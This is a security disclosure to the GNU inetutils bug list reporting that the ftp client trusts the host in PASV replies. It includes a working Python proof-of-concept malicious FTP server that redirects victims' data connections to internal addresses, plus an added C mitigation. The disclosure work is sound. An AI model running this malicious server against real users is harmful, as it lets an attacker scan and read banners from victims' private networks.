bug-inetutils

security issue in inetutils ftp client


From: ZeddYu Lu
Subject: security issue in inetutils ftp client
Date: Fri, 11 Jun 2021 17:46:13 +0800

Last year, curl had a security update for CVE-2020-8284. For more info, see https://hackerone.com/reports/1040166

The problem is that the ftp client trusts the host from the PASV response by default. A malicious server can trick the ftp client into connecting back to a given IP address and port. This may make the ftp client scan ports and extract service banners from a private network.

After testing the FTP client in GNU inetutils, I found that it has the same problem.

Inetutils Version:

ftp (GNU inetutils) 2.0 Copyright (C) 2021 Free Software Foundation, Inc.

Evil FTP server in Python:

#!/usr/bin/env python3
import socketserver, threading, requests, subprocess,time, base64, secrets,sys, hashlib, os

class MyTCPHandler(socketserver.StreamRequestHandler):
   def handle(self):
       print('[+] connected', self.request, file=sys.stderr)
       self.request.sendall(b'220 (vsFTPd 3.0.3)\r\n')

       self.data = self.rfile.readline().strip().decode()
       print(self.data, file=sys.stderr,flush=True)
       self.request.sendall(b'230 Login successful.\r\n')

       self.data = self.rfile.readline().strip().decode()
       print(self.data, file=sys.stderr)
       self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,203)\r\n')

       self.data = self.rfile.readline().strip().decode()
       print(self.data, file=sys.stderr)
       self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,203)\r\n')

       self.data = self.rfile.readline().strip().decode()
       print(self.data, file=sys.stderr)
       self.request.sendall(b'200 Switching to Binary mode.\r\n')

       self.data = self.rfile.readline().strip().decode()
       print(self.data, file=sys.stderr)
       self.request.sendall(b'125 Data connection already open. Transfer starting.\r\n')

       self.data = self.rfile.readline().strip().decode()
       print(self.data, file=sys.stderr)
       self.request.sendall(b'250 Requested file action okay, completed.')
       exit()

def ftp_worker():
   with socketserver.TCPServer(('0.0.0.0', 21), MyTCPHandler) as server:
       while True:
           server.handle_request()
threading.Thread(target=ftp_worker).start()
time.sleep(2)

After the victim types 'ls' in the ftp client, it will request 127.0.0.1, just like in the attachment. It will request the user's internal network.

Python also fixed this issue this year. Maybe this will help you: https://bugs.python.org/issue43285

You can find more impacts in https://hackerone.com/reports/1040166.

Attachment: Snipaste_2021-06-11_15-40-46.png
Description: PNG image
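
One client-side mitigation for the behaviour reported above, as an added example that is not part of the original message or of the inetutils code: parse the 227 reply, but connect the data channel to the control connection's peer address and never to the host the server advertises. The function name, the struct and the peer address 203.0.113.10 are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Where the client should open the data connection. */
struct pasv_target {
    uint32_t host;        /* IPv4 address to use, host byte order */
    uint16_t port;        /* data port taken from the reply */
    int host_overridden;  /* 1 if the server advertised another host */
};

/* Parse "227 ... (h1,h2,h3,h4,p1,p2)". The advertised host is only
 * compared, never used: the target host is always ctrl_peer, the
 * address the control connection is already talking to.
 * Returns 0 on success, -1 on a malformed reply. */
int pasv_safe_target(const char *reply, uint32_t ctrl_peer,
                     struct pasv_target *out)
{
    unsigned v[6];
    char end;
    const char *p;

    if (strncmp(reply, "227", 3) != 0 || (p = strchr(reply, '(')) == NULL)
        return -1;
    if (sscanf(p, "(%3u,%3u,%3u,%3u,%3u,%3u%c", &v[0], &v[1], &v[2],
               &v[3], &v[4], &v[5], &end) != 7 || end != ')')
        return -1;
    for (int i = 0; i < 6; i++)
        if (v[i] > 255)               /* each field is one octet */
            return -1;
    if (v[4] == 0 && v[5] == 0)       /* port 0 is not connectable */
        return -1;
    uint32_t advertised = (uint32_t)v[0] << 24 | v[1] << 16 | v[2] << 8 | v[3];
    out->port = (uint16_t)(v[4] << 8 | v[5]);
    out->host = ctrl_peer;
    out->host_overridden = (advertised != ctrl_peer);
    return 0;
}

int main(void)
{
    /* Reply string from the report; 203.0.113.10 is a constructed peer. */
    struct pasv_target t;
    if (pasv_safe_target("227 Entering Passive Mode (127,0,0,1,43,203)\r\n",
                         0xCB00710Au, &t) == 0)
        printf("data connection to %08x:%u (advertised host ignored: %d)\n",
               (unsigned)t.host, (unsigned)t.port, t.host_overridden);
    return 0;
}
```

A client can log `host_overridden` as a signal that the server advertised a host other than itself.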

